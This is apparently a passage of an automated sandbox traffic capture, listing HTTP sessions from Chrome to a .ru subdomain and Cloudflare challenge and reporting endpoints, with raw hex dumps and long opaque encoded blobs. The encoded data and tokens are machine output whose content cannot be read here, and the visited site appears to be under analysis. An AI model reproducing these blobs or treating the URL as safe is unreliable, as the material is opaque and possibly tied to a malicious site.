                                                                                  2025-01-07 18:49:05 UTC1369INData Raw: 63 67 45 68 31 41 48 55 45 6f 43 45 42 42 4d 55 67 71 4c 6a 51 68 4b 6c 42 63 4f 7a 68 61 4b 31 4e 66 54 6a 31 68 4f 43 34 76 4a 55 6f 6f 4f 30 74 59 5a 31 6b 2b 5a 43 39 4e 4c 54 56 6f 57 46 52 73 4d 56 4e 77 52 6e 59 36 58 6c 64 34 65 30 46 37 65 6c 52 77 65 46 5a 56 50 6b 64 4d 59 34 6d 4e 6b 33 53 4f 6a 49 5a 71 55 6d 4b 4a 6d 56 4b 53 69 5a 52 6f 58 6c 79 65 6b 33 78 31 69 4a 57 64 64 6e 2b 6d 71 33 61 4f 5a 71 65 49 66 4b 47 7a 6f 47 32 78 73 35 75 61 6b 35 6d 6f 66 72 32 36 73 72 57 66 78 4b 65 2b 66 37 57 30 6c 73 57 45 6f 35 65 34 71 70 4b 51 77 71 66 46 7a 61 37 47 77 35 58 5a 32 62 2b 52 7a 62 53 68 6e 35 71 7a 76 4d 66 64 32 64 79 30 32 4b 6e 4b 7a 37 69 2b 33 72 33 73 36 38 4b 75 78 39 44 51 39 2b 76 74 74 64 66 52 75 4c 54 41 39 75 37 34 32
                                                                                  Data Ascii: cgEh1AHUEoCEBBMUgqLjQhKlBcOzhaK1NfTj1hOC4vJUooO0tYZ1k+ZC9NLTVoWFRsMVNwRnY6Xld4e0F7elRweFZVPkdMY4mNk3SOjIZqUmKJmVKSiZRoXlyek3x1iJWddn+mq3aOZqeIfKGzoG2xs5uak5mofr26srWfxKe+f7W0lsWEo5e4qpKQwqfFza7Gw5XZ2b+RzbShn5qzvMfd2dy02KnKz7i+3r3s68Kux9DQ9+vttdfRuLTA9u742
                                                                                  2025-01-07 18:49:05 UTC1369INData Raw: 33 4c 43 55 61 52 53 6f 6e 54 55 5a 51 46 41 77 55 52 56 49 2b 45 56 6f 66 4e 78 6b 31 48 6d 4a 49 47 6a 63 34 50 45 49 2b 5a 6a 31 42 58 31 78 75 54 6b 64 55 54 6d 39 6e 5a 48 5a 38 54 31 78 57 55 57 39 73 66 30 35 58 5a 46 39 59 57 31 35 45 65 58 35 4e 61 6e 79 42 62 6e 43 49 5a 70 4e 77 59 35 68 32 61 46 79 64 6e 31 2b 68 6f 48 74 77 5a 4b 57 6a 5a 36 6d 6f 67 48 68 73 72 61 6c 76 73 62 43 47 67 48 53 31 72 58 65 35 75 49 71 49 66 4c 32 7a 75 72 4b 37 6c 63 4b 33 72 62 42 2f 76 4c 57 46 68 38 47 6d 70 49 2f 47 72 73 53 4c 6b 61 4b 51 78 5a 4f 72 7a 38 66 61 74 39 79 35 33 4c 2b 76 6e 36 79 30 31 36 61 6f 77 2b 62 6c 34 73 57 6b 34 61 4c 65 72 36 72 55 35 4d 4f 30 71 75 4c 77 32 75 54 56 36 2b 77 42 79 63 44 59 7a 39 62 6d 35 66 7a 34 39 63 62 55 31 2f
                                                                                  Data Ascii: 3LCUaRSonTUZQFAwURVI+EVofNxk1HmJIGjc4PEI+Zj1BX1xuTkdUTm9nZHZ8T1xWUW9sf05XZF9YW15EeX5NanyBbnCIZpNwY5h2aFydn1+hoHtwZKWjZ6mogHhsralvsbCGgHS1rXe5uIqIfL2zurK7lcK3rbB/vLWFh8GmpI/GrsSLkaKQxZOrz8fat9y53L+vn6y016aow+bl4sWk4aLer6rU5MO0quLw2uTV6+wBycDYz9bm5fz49cbU1/
                                                                                  2025-01-07 18:49:05 UTC1369INData Raw: 50 69 30 6a 57 54 63 7a 56 54 31 4b 57 7a 4e 66 51 57 46 56 54 56 41 39 4d 32 6c 4b 51 32 56 4e 58 45 39 6b 62 79 35 42 52 58 4e 78 5a 30 74 53 4d 32 6c 75 50 48 34 78 65 46 52 78 4f 6e 30 2f 66 55 43 41 63 31 4e 31 66 46 70 66 69 34 71 42 67 56 2b 4b 61 31 4a 32 63 32 39 6f 68 47 68 35 6a 6e 39 35 61 5a 53 58 66 70 47 67 59 5a 78 6a 6c 59 71 44 71 59 31 76 6e 6f 69 6b 73 72 43 48 62 48 61 79 6f 71 75 61 73 71 71 6d 66 48 32 76 74 62 4e 2f 6e 59 53 61 67 37 71 54 69 71 43 75 6d 36 6e 48 72 4a 43 64 78 4d 6d 65 72 35 4b 71 73 4a 47 54 6b 37 43 31 31 73 75 67 33 74 72 6d 35 64 6e 66 74 2b 6a 6c 35 64 6e 41 34 71 2f 64 7a 74 50 41 38 73 66 48 31 66 6a 31 7a 64 4c 4c 31 72 48 65 32 75 48 51 41 64 72 47 39 51 44 61 36 65 4d 41 78 4d 6b 4d 34 78 44 75 45 67 62
                                                                                  Data Ascii: Pi0jWTczVT1KWzNfQWFVTVA9M2lKQ2VNXE9kby5BRXNxZ0tSM2luPH4xeFRxOn0/fUCAc1N1fFpfi4qBgV+Ka1J2c29ohGh5jn95aZSXfpGgYZxjlYqDqY1vnoiksrCHbHayoquasqqmfH2vtbN/nYSag7qTiqCum6nHrJCdxMmer5KqsJGTk7C11sug3trm5dnft+jl5dnA4q/dztPA8sfH1fj1zdLL1rHe2uHQAdrG9QDa6eMAxMkM4xDuEgb
                                                                                  2025-01-07 18:49:05 UTC1369INData Raw: 52 51 59 4b 44 46 4f 58 79 38 65 5a 6b 59 38 56 31 6c 6a 4e 6d 4d 71 62 6a 38 74 4b 69 68 6b 51 46 41 73 52 31 55 77 55 55 64 4c 4c 31 52 4b 56 7a 70 41 57 6c 6c 50 51 44 2b 44 63 6e 79 4b 59 34 31 35 5a 59 35 5a 66 34 4f 48 55 5a 4b 59 5a 33 5a 51 6c 56 57 58 57 46 74 78 66 49 70 69 6d 34 52 67 5a 48 39 34 6f 6d 71 71 65 4b 43 74 6e 71 53 53 66 49 61 4b 68 6f 32 48 6f 70 69 75 6b 5a 32 35 6a 37 32 65 67 72 79 43 78 6e 35 39 70 70 76 41 78 37 2b 34 6c 71 4f 2b 6a 6f 32 54 78 38 4f 72 30 74 61 74 30 61 36 35 31 74 32 74 71 4d 32 62 72 39 79 74 6f 4e 44 59 35 2b 62 58 75 2b 62 75 78 61 71 2b 76 37 79 2f 33 63 33 6d 31 66 66 7a 73 73 66 38 73 4e 61 2f 37 66 54 66 77 77 49 42 41 74 44 39 77 77 54 37 34 77 6e 46 78 75 77 45 30 63 6f 57 46 4e 58 6d 43 68 73 51
                                                                                  Data Ascii: RQYKDFOXy8eZkY8V1ljNmMqbj8tKihkQFAsR1UwUUdLL1RKVzpAWllPQD+DcnyKY415ZY5Zf4OHUZKYZ3ZQlVWXWFtxfIpim4RgZH94omqqeKCtnqSSfIaKho2HopiukZ25j72egryCxn59ppvAx7+4lqO+jo2Tx8Or0tat0a651t2tqM2br9ytoNDY5+bXu+buxaq+v7y/3c3m1ffzssf8sNa/7fTfwwIBAtD9wwT74wnFxuwE0coWFNXmChsQ
                                                                                  2025-01-07 18:49:05 UTC1369INData Raw: 49 75 5a 54 68 63 57 55 64 59 4a 7a 67 72 5a 69 56 6a 5a 7a 70 79 51 30 56 30 61 33 49 76 64 6a 52 77 65 6c 52 63 64 31 74 77 66 47 31 6d 67 6c 42 36 5a 34 5a 47 62 47 71 4b 58 30 64 76 6a 6b 31 30 63 70 4a 6d 5a 48 65 57 56 56 64 36 6d 6d 36 53 66 35 35 63 58 34 4b 69 64 5a 71 48 70 6d 4f 4d 6e 61 42 71 62 70 32 6d 72 4a 79 70 63 4c 42 31 70 62 53 32 75 5a 69 63 66 5a 52 39 6e 6f 39 39 68 4a 53 55 6f 4b 47 7a 6d 4d 72 44 74 36 58 51 6f 62 75 6a 30 38 2f 45 6f 63 72 61 6f 74 71 5a 75 35 37 63 6e 74 48 67 34 4b 47 66 31 4f 69 68 70 4f 6a 63 70 38 4b 70 32 63 6e 47 35 64 37 54 34 4f 72 56 31 37 47 35 33 50 48 6f 2f 75 44 78 79 2b 7a 41 76 2f 33 62 2f 4d 58 54 39 66 34 4b 44 2b 72 37 32 77 72 37 39 4d 2f 7a 30 51 63 4e 44 76 55 54 43 51 66 56 2b 76 77 64 46
                                                                                  Data Ascii: IuZThcWUdYJzgrZiVjZzpyQ0V0a3IvdjRwelRcd1twfG1mglB6Z4ZGbGqKX0dvjk10cpJmZHeWVVd6mm6Sf55cX4KidZqHpmOMnaBqbp2mrJypcLB1pbS2uZicfZR9no99hJSUoKGzmMrDt6XQobuj08/EocraotqZu57cntHg4KGf1OihpOjcp8Kp2cnG5d7T4OrV17G53PHo/uDxy+zAv/3b/MXT9f4KD+r72wr79M/z0QcNDvUTCQfV+vwdF
                                                                                  2025-01-07 18:49:05 UTC1369INData Raw: 4b 50 45 78 45 4e 69 59 73 62 6c 4a 72 59 6b 6f 2b 55 31 46 30 57 6b 31 4d 56 45 5a 2b 56 58 67 2b 57 44 70 39 62 32 64 56 63 55 4e 43 64 48 6d 48 6a 57 4f 46 53 5a 42 52 67 58 36 55 61 6e 65 53 57 6f 70 64 66 6d 31 58 6d 56 74 79 6e 5a 6d 48 64 61 57 63 70 71 64 33 68 6f 6d 41 65 71 52 38 69 62 57 56 64 6f 69 52 71 33 71 53 72 58 53 30 71 59 79 7a 72 71 4b 79 77 34 57 36 6c 4a 32 37 76 70 75 36 7a 4b 53 2f 73 74 47 66 72 62 58 44 70 73 61 79 74 4d 54 64 7a 4a 71 78 7a 38 6d 55 73 62 2f 61 6f 37 58 49 70 63 71 69 71 4e 62 4f 33 73 54 46 78 75 76 53 73 4c 58 6d 32 64 61 33 74 4c 76 30 39 4d 6a 66 7a 38 7a 75 34 2f 54 42 34 39 6a 57 2f 50 58 57 37 64 63 48 35 67 37 4c 42 66 44 6e 39 65 55 53 42 78 6b 56 35 4f 34 4c 33 78 58 77 44 2b 4d 64 4a 79 59 6c 48 50
                                                                                  Data Ascii: KPExENiYsblJrYko+U1F0Wk1MVEZ+VXg+WDp9b2dVcUNCdHmHjWOFSZBRgX6UaneSWopdfm1XmVtynZmHdaWcpqd3homAeqR8ibWVdoiRq3qSrXS0qYyzrqKyw4W6lJ27vpu6zKS/stGfrbXDpsaytMTdzJqxz8mUsb/ao7XIpcqiqNbO3sTFxuvSsLXm2da3tLv09Mjfz8zu4/TB49jW/PXW7dcH5g7LBfDn9eUSBxkV5O4L3xXwD+MdJyYlHP
                                                                                  2025-01-07 18:49:05 UTC1369INData Raw: 62 31 49 73 5a 44 42 6e 4e 56 6c 69 4c 48 68 63 5a 6a 70 34 61 32 6c 37 4f 57 42 6c 50 6e 42 68 61 6e 78 69 5a 47 35 49 59 6d 31 78 68 6f 42 2b 66 6d 46 56 65 59 4b 61 6d 48 79 47 58 70 69 4c 69 5a 79 67 63 35 4f 68 5a 6e 52 62 67 4a 75 41 68 4a 2b 71 71 4b 47 6e 71 70 32 4c 73 4b 75 77 74 58 4f 31 74 70 57 48 6d 4d 43 4d 6a 4a 79 58 6f 4c 50 45 6d 73 58 4b 78 63 52 2f 68 38 71 34 7a 70 47 67 73 61 57 76 74 36 76 48 77 74 62 64 7a 64 75 66 32 63 72 55 72 4e 7a 46 73 39 61 34 75 65 4c 54 37 64 32 74 76 2b 71 36 75 74 44 4d 73 63 37 47 79 63 58 32 37 50 72 2b 39 50 33 39 75 67 45 44 2b 50 37 59 34 64 2f 39 2f 73 67 47 35 2f 66 6b 43 65 58 75 37 51 51 4e 39 65 48 73 45 52 73 63 36 2f 59 55 31 39 73 63 48 69 54 34 48 2f 49 6e 45 78 50 35 34 69 67 49 42 75 33
                                                                                  Data Ascii: b1IsZDBnNVliLHhcZjp4a2l7OWBlPnBhanxiZG5IYm1xhoB+fmFVeYKamHyGXpiLiZygc5OhZnRbgJuAhJ+qqKGnqp2LsKuwtXO1tpWHmMCMjJyXoLPEmsXKxcR/h8q4zpGgsaWvt6vHwtbdzduf2crUrNzFs9a4ueLT7d2tv+q6utDMsc7GycX27Pr+9P39ugED+P7Y4d/9/sgG5/fkCeXu7QQN9eHsERsc6/YU19scHiT4H/InExP54igIBu3
                                                                                  2025-01-07 18:49:05 UTC1369INData Raw: 69 6f 34 65 58 56 75 64 6d 64 38 61 7a 78 53 66 57 52 63 68 59 46 52 4f 31 71 43 66 6f 75 41 64 32 46 4a 69 59 71 55 63 47 70 6c 64 31 6d 54 63 5a 74 2b 69 31 46 73 6e 6e 57 55 58 58 36 6d 63 5a 71 57 64 58 4f 74 5a 6d 42 39 70 71 4b 74 6e 71 36 74 6b 6d 2b 34 63 4b 64 36 6d 61 71 38 69 62 43 79 76 62 4b 2b 6f 37 53 51 76 49 54 45 67 34 79 4d 76 63 58 46 79 63 75 4b 70 71 69 30 70 71 65 78 6c 4e 7a 4a 7a 35 6a 61 72 65 4b 7a 31 70 71 2f 34 65 4c 68 70 71 54 6d 71 74 57 67 36 72 37 42 72 39 2f 72 79 76 66 77 30 72 66 49 7a 72 66 4a 76 74 33 7a 37 4e 6a 67 76 50 44 6c 35 4d 44 30 36 65 6a 45 2b 4f 33 73 79 50 7a 78 38 4d 33 64 39 75 66 6b 43 4f 76 6c 39 4e 6a 31 37 4f 67 55 38 4f 34 6a 34 41 50 78 41 52 30 62 34 76 34 66 4a 67 41 4c 45 53 77 63 42 76 34 55
                                                                                  Data Ascii: io4eXVudmd8azxSfWRchYFRO1qCfouAd2FJiYqUcGpld1mTcZt+i1FsnnWUXX6mcZqWdXOtZmB9pqKtnq6tkm+4cKd6maq8ibCyvbK+o7SQvITEg4yMvcXFycuKpqi0pqexlNzJz5jareKz1pq/4eLhpqTmqtWg6r7Br9/ryvfw0rfIzrfJvt3z7NjgvPDl5MD06ejE+O3syPzx8M3d9ufkCOvl9Nj17OgU8O4j4APxAR0b4v4fJgALESwcBv4U


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.64975635.190.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:05 UTC538OUTOPTIONS /report/v4?s=mS%2BSvftu%2FM9y10SgHt2G7NAeC0bqMj4hrxiWPGvuRdNCCnilPQ1Sanfz6Cb6zUOf6zIAiDT7U8Fld0hG92W3flQATbLyo8jx17Lsvpbg3E2BzBiXYc5DPgBkwgP0fQ%3D%3D HTTP/1.1
                                                                                  Host: a.nel.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Origin: https://7x8x.digitalvoyage.ru
                                                                                  Access-Control-Request-Method: POST
                                                                                  Access-Control-Request-Headers: content-type
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:05 UTC336INHTTP/1.1 200 OK
                                                                                  Content-Length: 0
                                                                                  access-control-max-age: 86400
                                                                                  access-control-allow-methods: POST, OPTIONS
                                                                                  access-control-allow-origin: *
                                                                                  access-control-allow-headers: content-type, content-length
                                                                                  date: Tue, 07 Jan 2025 18:49:05 GMT
                                                                                  Via: 1.1 google
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.64976235.190.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:05 UTC474OUTPOST /report/v4?s=mS%2BSvftu%2FM9y10SgHt2G7NAeC0bqMj4hrxiWPGvuRdNCCnilPQ1Sanfz6Cb6zUOf6zIAiDT7U8Fld0hG92W3flQATbLyo8jx17Lsvpbg3E2BzBiXYc5DPgBkwgP0fQ%3D%3D HTTP/1.1
                                                                                  Host: a.nel.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 436
                                                                                  Content-Type: application/reports+json
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:05 UTC436OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 37 78 38 78 2e 64 69 67 69 74 61 6c 76 6f 79 61 67 65 2e 72 75 2f 78 61 78 62 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 31 31 32 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f
                                                                                  Data Ascii: [{"age":0,"body":{"elapsed_time":110,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://7x8x.digitalvoyage.ru/xaxb/","sampling_fraction":1.0,"server_ip":"104.21.112.1","status_code":404,"type":"http.error"},"type":"network-erro
                                                                                  2025-01-07 18:49:06 UTC168INHTTP/1.1 200 OK
                                                                                  Content-Length: 0
                                                                                  date: Tue, 07 Jan 2025 18:49:05 GMT
                                                                                  Via: 1.1 google
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.649767104.18.94.414436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:06 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/2126003918:1736274592:yhHrOMcq_yWVDdXkB-uSkPp0ozwhPwfQV3b4Q4T8_y4/8fe6202638555e78/b.m.fsd2Rbe6MMJrUqvVhKuNQiNdicvfSU7g3CyBe5Y-1736275743-1.1.1.1-UpjN468qQSLsm5ZjAEnXayNCiOtSagLrG.JkdhMYYDDWRSzdyKgyRB4Xb2RdeasX HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:06 UTC379INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 07 Jan 2025 18:49:06 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 7
                                                                                  Connection: close
                                                                                  cf-chl-out: BjzHT0jJ1x5Y/F+Nk6moRlaNFL8dKPfVfBI=$B8S9i70q2sKm2Yov
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fe620377ba943f8-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-07 18:49:06 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                  Data Ascii: invalid


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.2.649769104.18.95.414436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:06 UTC782OUTGET /cdn-cgi/challenge-platform/h/g/i/8fe6202638555e78/1736275745391/xSVrIn8xCejtnR6 HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3jv6g/0x4AAAAAAA4slXohRcRTneR7/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:06 UTC200INHTTP/1.1 200 OK
                                                                                  Date: Tue, 07 Jan 2025 18:49:06 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 61
                                                                                  Connection: close
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fe620388b4f8c29-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-07 18:49:06 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 15 08 02 00 00 00 8b f4 2a 68 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: PNGIHDR2*hIDAT$IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  25192.168.2.649778104.18.94.414436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:07 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8fe6202638555e78/1736275745391/xSVrIn8xCejtnR6 HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:07 UTC200INHTTP/1.1 200 OK
                                                                                  Date: Tue, 07 Jan 2025 18:49:07 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 61
                                                                                  Connection: close
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fe6203d09925e82-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-07 18:49:07 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 15 08 02 00 00 00 8b f4 2a 68 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: PNGIHDR2*hIDAT$IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  26192.168.2.649779104.18.95.414436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:07 UTC811OUTGET /cdn-cgi/challenge-platform/h/g/pat/8fe6202638555e78/1736275745394/47801d01b633f5853ccee222f6369c4f157328d309ea959c6ffee87f510f2278/hatudjn-Xn1x_Eh HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: max-age=0
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3jv6g/0x4AAAAAAA4slXohRcRTneR7/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:07 UTC143INHTTP/1.1 401 Unauthorized
                                                                                  Date: Tue, 07 Jan 2025 18:49:07 GMT
                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                  Content-Length: 1
                                                                                  Connection: close
                                                                                  2025-01-07 18:49:07 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 52 34 41 64 41 62 59 7a 39 59 55 38 7a 75 49 69 39 6a 61 63 54 78 56 7a 4b 4e 4d 4a 36 70 57 63 62 5f 37 6f 66 31 45 50 49 6e 67 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                  Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gR4AdAbYz9YU8zuIi9jacTxVzKNMJ6pWcb_7of1EPIngAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                  2025-01-07 18:49:07 UTC1INData Raw: 4a
                                                                                  Data Ascii: J


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  27192.168.2.649786104.18.95.414436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:08 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/2126003918:1736274592:yhHrOMcq_yWVDdXkB-uSkPp0ozwhPwfQV3b4Q4T8_y4/8fe6202638555e78/b.m.fsd2Rbe6MMJrUqvVhKuNQiNdicvfSU7g3CyBe5Y-1736275743-1.1.1.1-UpjN468qQSLsm5ZjAEnXayNCiOtSagLrG.JkdhMYYDDWRSzdyKgyRB4Xb2RdeasX HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 32800
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                  CF-Chl-RetryAttempt: 0
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  CF-Challenge: b.m.fsd2Rbe6MMJrUqvVhKuNQiNdicvfSU7g3CyBe5Y-1736275743-1.1.1.1-UpjN468qQSLsm5ZjAEnXayNCiOtSagLrG.JkdhMYYDDWRSzdyKgyRB4Xb2RdeasX
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Origin: https://challenges.cloudflare.com
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3jv6g/0x4AAAAAAA4slXohRcRTneR7/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
